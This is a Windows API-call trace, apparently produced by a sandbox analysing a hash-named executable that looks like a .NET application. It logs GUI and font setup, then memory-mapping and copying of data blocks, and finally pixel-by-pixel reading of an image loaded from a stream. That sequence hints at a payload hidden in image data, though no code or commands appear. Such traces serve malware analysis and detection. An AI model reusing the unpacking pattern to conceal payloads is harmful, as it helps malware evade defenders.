[0103.907] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.907] AdjustWindowRectEx (in: lpRect=0x19f0e8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f0e8) returned 1
[0103.914] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.914] AdjustWindowRectEx (in: lpRect=0x19f048, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f048) returned 1
[0103.914] GdipGetFamilyName (in: family=0x5c70880, name=0x19f014, language=0x409 | out: name="Arial") returned 0x0
[0103.914] GetDeviceCaps (hdc=0x3701098e, index=90) returned 96
[0103.915] CoTaskMemAlloc (cb=0x5c) returned 0x6fa628
[0103.915] CreateFontIndirectW (lplf=0x6fa628) returned 0x250a097a
[0103.915] CoTaskMemFree (pv=0x6fa628)
[0103.915] GetObjectW (in: h=0x250a097a, c=92, pv=0x19efd8 | out: pv=0x19efd8) returned 92
[0103.917] GetTextExtentPoint32W (in: hdc=0x3701098e, lpString="0", c=1, psizl=0x233c45c | out: psizl=0x233c45c) returned 1
[0103.917] DeleteObject (ho=0x250a097a) returned 1
[0103.917] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.917] AdjustWindowRectEx (in: lpRect=0x19f17c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f17c) returned 1
[0103.918] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.918] AdjustWindowRectEx (in: lpRect=0x19f048, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f048) returned 1
[0103.918] GdipGetFamilyName (in: family=0x5c70880, name=0x19f014, language=0x409 | out: name="Arial") returned 0x0
[0103.918] GetDeviceCaps (hdc=0x3701098e, index=90) returned 96
[0103.918] CoTaskMemAlloc (cb=0x5c) returned 0x6fa350
[0103.918] CreateFontIndirectW (lplf=0x6fa350) returned 0x260a097a
[0103.918] CoTaskMemFree (pv=0x6fa350)
[0103.918] GetObjectW (in: h=0x260a097a, c=92, pv=0x19efd8 | out: pv=0x19efd8) returned 92
[0103.918] GetTextExtentPoint32W (in: hdc=0x3701098e, lpString="0", c=1, psizl=0x233c638 | out: psizl=0x233c638) returned 1
[0103.919] DeleteObject (ho=0x260a097a) returned 1
[0103.919] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0103.919] AdjustWindowRectEx (in: lpRect=0x19f024, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f024) returned 1
[0103.936] GdipGetFamilyName (in: family=0x5c70880, name=0x19ef14, language=0x409 | out: name="Arial") returned 0x0
[0103.937] GetDeviceCaps (hdc=0x3701098e, index=90) returned 96
[0103.937] CoTaskMemAlloc (cb=0x5c) returned 0x6fa5c0
[0103.937] CreateFontIndirectW (lplf=0x6fa5c0) returned 0x290a0685
[0103.937] CoTaskMemFree (pv=0x6fa5c0)
[0103.937] GetObjectW (in: h=0x290a0685, c=92, pv=0x19eed8 | out: pv=0x19eed8) returned 92
[0103.938] GetMapMode (hdc=0x3701098e) returned 1
[0103.938] GetTextMetricsW (in: hdc=0x3701098e, lptm=0x19ef00 | out: lptm=0x19ef00) returned 1
[0103.939] DrawTextExW (in: hdc=0x3701098e, lpchText="Chipu and Co.", cchText=13, lprc=0x19f00c, format=0x2400, lpdtp=0x233c8dc | out: lpchText="Chipu and Co.", lprc=0x19f00c) returned 24
[0104.000] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.000] AdjustWindowRectEx (in: lpRect=0x19f0f8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f0f8) returned 1
[0104.000] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.000] AdjustWindowRectEx (in: lpRect=0x19f05c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f05c) returned 1
[0104.000] GdipGetFamilyName (in: family=0x5c74488, name=0x19f028, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0104.000] GetDeviceCaps (hdc=0x3701098e, index=90) returned 96
[0104.001] CoTaskMemAlloc (cb=0x5c) returned 0x6fa4f0
[0104.001] CreateFontIndirectW (lplf=0x6fa4f0) returned 0x5f0a0972
[0104.001] CoTaskMemFree (pv=0x6fa4f0)
[0104.001] GetObjectW (in: h=0x5f0a0972, c=92, pv=0x19efec | out: pv=0x19efec) returned 92
[0104.001] SelectObject (hdc=0x3701098e, h=0x5f0a0972) returned 0x300a096d
[0104.001] DeleteObject (ho=0x300a096d) returned 1
[0104.001] GetTextExtentPoint32W (in: hdc=0x3701098e, lpString="0", c=1, psizl=0x233cb4c | out: psizl=0x233cb4c) returned 1
[0104.001] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.002] AdjustWindowRectEx (in: lpRect=0x19f130, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f130) returned 1
[0104.002] GdipCreateFontFamilyFromName (name="Arial", fontCollection=0x0, fontFamily=0x19f1f8) returned 0x0
[0104.002] GdipCreateFont (fontFamily=0x5c70880, emSize=0x417c0000, style=1, unit=0x3, font=0x233cc54) returned 0x0
[0104.002] GdipGetFontSize (font=0x5c7b080, size=0x233cc58) returned 0x0
[0104.002] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.002] AdjustWindowRectEx (in: lpRect=0x19f014, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f014) returned 1
[0104.002] GdipGetFamilyName (in: family=0x5c70880, name=0x19efe0, language=0x409 | out: name="Arial") returned 0x0
[0104.002] GetDeviceCaps (hdc=0x3701098e, index=90) returned 96
[0104.002] CoTaskMemAlloc (cb=0x5c) returned 0x6fa280
[0104.002] CreateFontIndirectW (lplf=0x6fa280) returned 0x310a096d
[0104.002] CoTaskMemFree (pv=0x6fa280)
[0104.002] GetObjectW (in: h=0x310a096d, c=92, pv=0x19efa4 | out: pv=0x19efa4) returned 92
[0104.003] SelectObject (hdc=0x3701098e, h=0x310a096d) returned 0x5f0a0972
[0104.003] DeleteObject (ho=0x5f0a0972) returned 1
[0104.003] GetTextExtentPoint32W (in: hdc=0x3701098e, lpString="0", c=1, psizl=0x233cec0 | out: psizl=0x233cec0) returned 1
[0104.003] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.003] AdjustWindowRectEx (in: lpRect=0x19f0e8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f0e8) returned 1
[0104.004] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.004] AdjustWindowRectEx (in: lpRect=0x19f048, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f048) returned 1
[0104.004] GdipGetFamilyName (in: family=0x5c70880, name=0x19f014, language=0x409 | out: name="Arial") returned 0x0
[0104.004] GetDeviceCaps (hdc=0x3701098e, index=90) returned 96
[0104.004] CoTaskMemAlloc (cb=0x5c) returned 0x6fa0e0
[0104.004] CreateFontIndirectW (lplf=0x6fa0e0) returned 0x600a0972
[0104.004] CoTaskMemFree (pv=0x6fa0e0)
[0104.004] GetObjectW (in: h=0x600a0972, c=92, pv=0x19efd8 | out: pv=0x19efd8) returned 92
[0104.004] GetTextExtentPoint32W (in: hdc=0x3701098e, lpString="0", c=1, psizl=0x233d0a0 | out: psizl=0x233d0a0) returned 1
[0104.004] DeleteObject (ho=0x600a0972) returned 1
[0104.005] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.005] AdjustWindowRectEx (in: lpRect=0x19f17c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f17c) returned 1
[0104.005] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.005] AdjustWindowRectEx (in: lpRect=0x19f048, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f048) returned 1
[0104.005] GdipGetFamilyName (in: family=0x5c70880, name=0x19f014, language=0x409 | out: name="Arial") returned 0x0
[0104.005] GetDeviceCaps (hdc=0x3701098e, index=90) returned 96
[0104.005] CoTaskMemAlloc (cb=0x5c) returned 0x6fa0e0
[0104.005] CreateFontIndirectW (lplf=0x6fa0e0) returned 0x610a0972
[0104.005] CoTaskMemFree (pv=0x6fa0e0)
[0104.005] GetObjectW (in: h=0x610a0972, c=92, pv=0x19efd8 | out: pv=0x19efd8) returned 92
[0104.006] GetTextExtentPoint32W (in: hdc=0x3701098e, lpString="0", c=1, psizl=0x233d27c | out: psizl=0x233d27c) returned 1
[0104.006] DeleteObject (ho=0x610a0972) returned 1
[0104.006] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.006] AdjustWindowRectEx (in: lpRect=0x19f024, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f024) returned 1
[0104.006] DrawTextExW (in: hdc=0x3701098e, lpchText="LMS", cchText=3, lprc=0x19f00c, format=0x2400, lpdtp=0x233d2f0 | out: lpchText="LMS", lprc=0x19f00c) returned 24
[0104.006] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.006] AdjustWindowRectEx (in: lpRect=0x19f0f8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f0f8) returned 1
[0104.007] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.007] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19f1a8) returned 1
[0104.007] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.007] AdjustWindowRectEx (in: lpRect=0x19f1a8, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19f1a8) returned 1
[0104.008] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.008] AdjustWindowRectEx (in: lpRect=0x19f1dc, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19f1dc) returned 1
[0104.008] GetSystemMetrics (nIndex=59) returned 1456
[0104.008] GetSystemMetrics (nIndex=60) returned 916
[0104.008] GetSystemMetrics (nIndex=34) returned 136
[0104.008] GetSystemMetrics (nIndex=35) returned 39
[0104.008] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.009] AdjustWindowRectEx (in: lpRect=0x19f0dc, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19f0dc) returned 1
[0104.009] GetCurrentThreadId () returned 0x1398
[0104.009] GetCurrentThreadId () returned 0x1398
[0104.009] GetCurrentThreadId () returned 0x1398
[0104.009] GetCurrentThreadId () returned 0x1398
[0104.009] GetCurrentThreadId () returned 0x1398
[0104.009] GetCurrentThreadId () returned 0x1398
[0104.010] CreateCompatibleDC (hdc=0x0) returned 0x62010972
[0104.010] GetDC (hWnd=0x0) returned 0xc0100ae
[0104.010] GdipCreateFromHDC (hdc=0xc0100ae, graphics=0x19f02c) returned 0x0
[0104.011] CoTaskMemAlloc (cb=0x5c) returned 0x6fa0e0
[0104.011] GdipGetLogFontW (font=0x4c6efc0, graphics=0x5c7f3b8, logfontW=0x6fa0e0) returned 0x0
[0104.015] CoTaskMemFree (pv=0x6fa0e0)
[0104.015] CoTaskMemAlloc (cb=0x5c) returned 0x6fa350
[0104.015] CoTaskMemFree (pv=0x6fa350)
[0104.015] CoTaskMemAlloc (cb=0x5c) returned 0x6fa1b0
[0104.015] CoTaskMemFree (pv=0x6fa1b0)
[0104.015] GdipDeleteGraphics (graphics=0x5c7f3b8) returned 0x0
[0104.015] ReleaseDC (hWnd=0x0, hDC=0xc0100ae) returned 1
[0104.015] CoTaskMemAlloc (cb=0x5c) returned 0x6fa0e0
[0104.016] CreateFontIndirectW (lplf=0x6fa0e0) returned 0x180a05de
[0104.016] CoTaskMemFree (pv=0x6fa0e0)
[0104.016] SelectObject (hdc=0x62010972, h=0x180a05de) returned 0x18a0048
[0104.016] GetTextMetricsW (in: hdc=0x62010972, lptm=0x19f138 | out: lptm=0x19f138) returned 1
[0104.016] GetTextExtentPoint32W (in: hdc=0x62010972, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x233d798 | out: psizl=0x233d798) returned 1
[0104.016] SelectObject (hdc=0x62010972, h=0x18a0048) returned 0x180a05de
[0104.017] DeleteDC (hdc=0x62010972) returned 1
[0104.017] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.017] AdjustWindowRectEx (in: lpRect=0x19f118, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19f118) returned 1
[0104.017] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.018] AdjustWindowRectEx (in: lpRect=0x19ef7c, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19ef7c) returned 1
[0104.018] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.018] AdjustWindowRectEx (in: lpRect=0x19f0e4, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f0e4) returned 1
[0104.018] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.018] AdjustWindowRectEx (in: lpRect=0x19ef48, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ef48) returned 1
[0104.018] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.018] AdjustWindowRectEx (in: lpRect=0x19f0e4, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f0e4) returned 1
[0104.018] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.019] AdjustWindowRectEx (in: lpRect=0x19ef48, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ef48) returned 1
[0104.019] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.019] AdjustWindowRectEx (in: lpRect=0x19f0e4, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f0e4) returned 1
[0104.019] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.019] AdjustWindowRectEx (in: lpRect=0x19ef48, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ef48) returned 1
[0104.019] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.019] AdjustWindowRectEx (in: lpRect=0x19f0e4, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f0e4) returned 1
[0104.019] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.019] AdjustWindowRectEx (in: lpRect=0x19ef48, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ef48) returned 1
[0104.020] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.020] AdjustWindowRectEx (in: lpRect=0x19f0e4, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f0e4) returned 1
[0104.020] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.020] AdjustWindowRectEx (in: lpRect=0x19ef48, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ef48) returned 1
[0104.020] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.020] AdjustWindowRectEx (in: lpRect=0x19f118, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19f118) returned 1
[0104.020] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.020] AdjustWindowRectEx (in: lpRect=0x19ef7c, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19ef7c) returned 1
[0104.021] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.021] AdjustWindowRectEx (in: lpRect=0x19f0e4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f0e4) returned 1
[0104.021] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.021] AdjustWindowRectEx (in: lpRect=0x19ef48, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ef48) returned 1
[0104.021] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.021] AdjustWindowRectEx (in: lpRect=0x19eda4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eda4) returned 1
[0104.021] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.021] AdjustWindowRectEx (in: lpRect=0x19f0e4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19f0e4) returned 1
[0104.022] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.022] AdjustWindowRectEx (in: lpRect=0x19ef48, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19ef48) returned 1
[0104.022] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.022] AdjustWindowRectEx (in: lpRect=0x19eda4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19eda4) returned 1
[0104.022] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.023] AdjustWindowRectEx (in: lpRect=0x19ee90, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19ee90) returned 1
[0104.023] AdjustWindowRectEx (in: lpRect=0x19f0b0, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19f0b0) returned 1
[0104.024] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.024] AdjustWindowRectEx (in: lpRect=0x19ee08, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19ee08) returned 1
[0104.024] AdjustWindowRectEx (in: lpRect=0x19eee8, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x19eee8) returned 1
[0104.024] GetSystemMetrics (nIndex=34) returned 136
[0104.024] GetSystemMetrics (nIndex=35) returned 39
[0104.024] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.024] AdjustWindowRectEx (in: lpRect=0x19f078, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19f078) returned 1
[0104.024] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ed50000
[0104.025] AdjustWindowRectEx (in: lpRect=0x19eedc, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x19eedc) returned 1
[0104.099] EtwEventRegister (in: ProviderId=0x233e1d8, EnableCallback=0x4a7065e, CallbackContext=0x0, RegHandle=0x233e1b4 | out: RegHandle=0x233e1b4) returned 0x0
[0104.101] EtwEventSetInformation (RegHandle=0x705230, InformationClass=0x32, EventInformation=0x2, InformationLength=0x233e148) returned 0x0
[0104.109] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe.config", nBufferLength=0x105, lpBuffer=0x19ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe.config", lpFilePart=0x0) returned 0x69
[0104.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19eeb0) returned 1
[0104.110] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\7907827ba244123ddc19a986203a2df7f7b9e7d984ff8efe6715372e2f431062.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x19ef2c | out: lpFileInformation=0x19ef2c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0104.111] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19eeac) returned 1
[0104.668] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x19f168 | out: pfEnabled=0x19f168) returned 0x0
[0104.756] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa00, lpName=0x0) returned 0x2f8
[0104.757] memcpy (in: _Dst=0x2200000, _Src=0x2350994, _Size=0xfa00 | out: _Dst=0x2200000) returned 0x2200000
[0104.758] CloseHandle (hObject=0x2f8) returned 1
[0151.777] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2e00, lpName=0x0) returned 0x304
[0151.778] memcpy (in: _Dst=0x4830000, _Src=0x2358454, _Size=0x2e00 | out: _Dst=0x4830000) returned 0x4830000
[0151.778] CloseHandle (hObject=0x304) returned 1
[0151.802] CoTaskMemAlloc (cb=0x20c) returned 0x715908
[0151.802] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x715908 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25
[0151.802] CoTaskMemFree (pv=0x715908)
[0151.803] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x19def8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16
[0151.805] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x19df0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29
[0152.354] GdipLoadImageFromStream (stream=0x4840030, image=0x19e960) returned 0x0
[0152.722] GdipImageForceValidation (image=0x5c7f3b8) returned 0x0
[0152.735] GdipGetImageType (image=0x5c7f3b8, type=0x19e95c) returned 0x0
[0152.736] GdipGetImageRawFormat (image=0x5c7f3b8, format=0x19e8d0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0
[0152.753] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eee8) returned 0x0
[0152.754] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.754] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.755] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=0, color=0x19eed4) returned 0x0
[0152.844] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.844] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.844] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=1, color=0x19eed4) returned 0x0
[0152.844] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.844] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.844] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=2, color=0x19eed4) returned 0x0
[0152.845] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.845] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.845] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=3, color=0x19eed4) returned 0x0
[0152.845] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.845] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.845] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=4, color=0x19eed4) returned 0x0
[0152.845] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.845] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.845] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=5, color=0x19eed4) returned 0x0
[0152.845] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.845] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.845] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=6, color=0x19eed4) returned 0x0
[0152.845] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.845] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.845] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=7, color=0x19eed4) returned 0x0
[0152.845] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.846] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.846] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=8, color=0x19eed4) returned 0x0
[0152.846] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.846] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.846] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=9, color=0x19eed4) returned 0x0
[0152.846] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.846] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.846] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=10, color=0x19eed4) returned 0x0
[0152.846] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.846] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.846] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=11, color=0x19eed4) returned 0x0
[0152.846] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.846] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.846] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=12, color=0x19eed4) returned 0x0
[0152.846] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.846] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.846] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=13, color=0x19eed4) returned 0x0
[0152.846] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.846] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.846] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=14, color=0x19eed4) returned 0x0
[0152.847] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.847] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.847] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=15, color=0x19eed4) returned 0x0
[0152.847] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.847] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.847] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=16, color=0x19eed4) returned 0x0
[0152.847] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.847] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.847] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=17, color=0x19eed4) returned 0x0
[0152.847] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.847] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.847] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=18, color=0x19eed4) returned 0x0
[0152.847] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.847] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.847] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=19, color=0x19eed4) returned 0x0
[0152.847] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.847] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.847] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=20, color=0x19eed4) returned 0x0
[0152.847] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.847] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
